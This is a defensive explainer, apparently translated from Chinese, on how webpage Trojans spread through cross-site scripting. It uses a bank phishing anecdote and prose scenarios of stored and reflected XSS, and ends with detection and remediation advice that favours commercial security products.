Early Prevention of webpage Trojans

"Typhoid" is a highly infectious disease that can be infected if exposed. Because the Web application system adopts standard protocols, if a Web server is infected with Trojans, visitors will be infected as if they were exposed to a patient with a cold illness, and will be themselves stolen and damaged by information:

If you frequently access the Internet, you may find that when you click on some links, the anti-virus software will trigger an alarm, prompting you that a virus or Trojan exists. Ms. Y, the director of a bank's Technology Department, is worried about such a customer complaint: an online banking user received an online banking activity notification email. After clicking the email, she found that the website was reported as a Trojan by the anti-virus software.

After Ms. Y apologized, the customer's anger seemed to fade away and said she could forward the "accident" email to Ms. Y. This email is a small investigation activity being conducted by the Bank during this time. After clicking the "participate in activity" button, the anti-virus software immediately sends an alarm. After analysis by professional security company experts, it was found that this is a forged activity email. The hacker forged the URL link after the "participate in activity" button. After clicking it, the user will enter the activity page, but it will also be linked to a malicious site to download Trojans, which is why the anti-virus software generates alarms. The cause of this phenomenon is that the Bank's website page code is defective. Considering the Bank's business continuity requirements, Ms. Y purchased security protection products as recommended by security experts and quickly deployed them online to prevent such attacks.

Why does webpage links cause Trojan viruses to be implanted? There are several possibilities:

A) website owners intentionally embed malicious code on pages: common in private websites. For personal gain, some webmasters intentionally embed malicious code into the website pages to steal visitors' information. Generally, enterprise users do not.

B) add malicious code to the normal page after hackers attack the website to obtain permissions. This is also the cross-site scripting (XSS) attack ※.

※Explanation: XSS (Cross-Site Scripting) Attacks

XSS is a computer security vulnerability that often occurs in web applications. It allows malicious web users to implant code into pages provided to other users. For example, these codes include HTML code and client script. Attackers exploit the XSS vulnerability to bypass access control, such as the same origin policy ). This type of vulnerability is widely known because it is used by hackers to write more harmful phishing attacks. The cross-site scripting vulnerability is mainly caused by the absence of effective verification of all user input, which affects all Web application frameworks.

In practice, XSS attacks have two common forms: storage-type attacks and reflection-type attacks.

Stored XSS: The most common type. Hackers upload attack scripts to Web servers, which makes information leakage possible for all users accessing this page, it also includes the administrator of the Web server. The attack process is as follows:

Bob has a Web site that allows users to publish or browse published information.

Charly noticed that Bob's website has the XXS vulnerability.

Charly released a hotspot to attract other users to read it.

Bob or anyone else, such as Alice, browses this information, and his session cookies or other information will be stolen by Charly.

Reflected XSS: When a Web client uses a Server script to generate a page to provide data for users, if unauthenticated user data is included in the page without HTML Entity encoding, client code can be injected into dynamic pages. The attack process is as follows:

Alice often browses a website owned by Bob. Bob's website runs Alice and uses the user name/password to log on and store sensitive information (such as bank account information ).

Charly found that Bob's website contains a reflective XSS vulnerability.

Charly writes a URL that exploits the vulnerability and impersonates it as an email from Bob and sends it to Alice.

After Alice logs on to Bob's website, she browses the URL provided by Charly.

Malicious scripts embedded in the URL are executed in Alice's browser, just as they are directly from Bob's server. This script steals sensitive information (authorization, credit card, account information, etc.) and sends the information to the Charly Web site without Alice's knowledge.

In the above example, Ms. Y encountered this type of XSS attack.

How can I determine whether I have suffered XSS attacks? Like other common attacks, XSS attacks also have many free tools on the Internet. hackers using these software may not know how to clean up their system logs, from the log analysis, we can easily see whether XSS attacks occur. Another more direct method is to check the page source code to see if any irrelevant URL or other strings appear. For example, a page source file contains code unrelated to the page function, it is likely that XSS attacks have occurred.

Because the direct victims of XSS attacks are not the website owner, but common users who access the attacked website, common users often find that the website has been attacked by hackers, however, the website administrator still knows nothing about the situation. For some organizations that rely on websites for business (such as financial institutions), it is very important to do a good job of pre-site inspection services.

※Explanation: website Inspection Service

In general, the consequences of XSS attacks are hard to be directly discovered. For example, in the above case, if the hacker adds an attack string that is not a webpage Trojan, but steals cookie information, when users are under attack, there will be no symptoms at all, and this threat will be more dangerous.

A common method is to purchase a professional security company's webpage Trojan Monitoring Service and regularly check whether the website page contains malicious code.

What should I do after an XSS attack? First, check the attacked page, clear malicious code, and then consider future defense. Like most Web threats, XSS attacks are caused by incomplete page file writing, you can also deploy independent security products or code-level page files to avoid modification. But considering the complexity and limitations of code modification, XSS defense is not the best choice. Instead, you should choose to deploy security products that are competent for application-layer threat protection (we will not describe them here). In the actual application of XSS defense, intrusion defense products are also widely used.

Websites infected with Trojan horses are like patients with typhoid fever. If they are accidentally exposed (click the link), they may be infected (infected with Trojans. Traditional Chinese medicine believes that the principle of the total treatment of the sixth menstrual disease is to eliminate external evil and help upright. Therefore, the solution to websites infected with Trojans should also be like this: Get rid of external evil (clean up the infected page ), positive attitude (to increase security devices, code evaluation services, code patching, and other behaviors to improve the website's internal defensive capabilities ).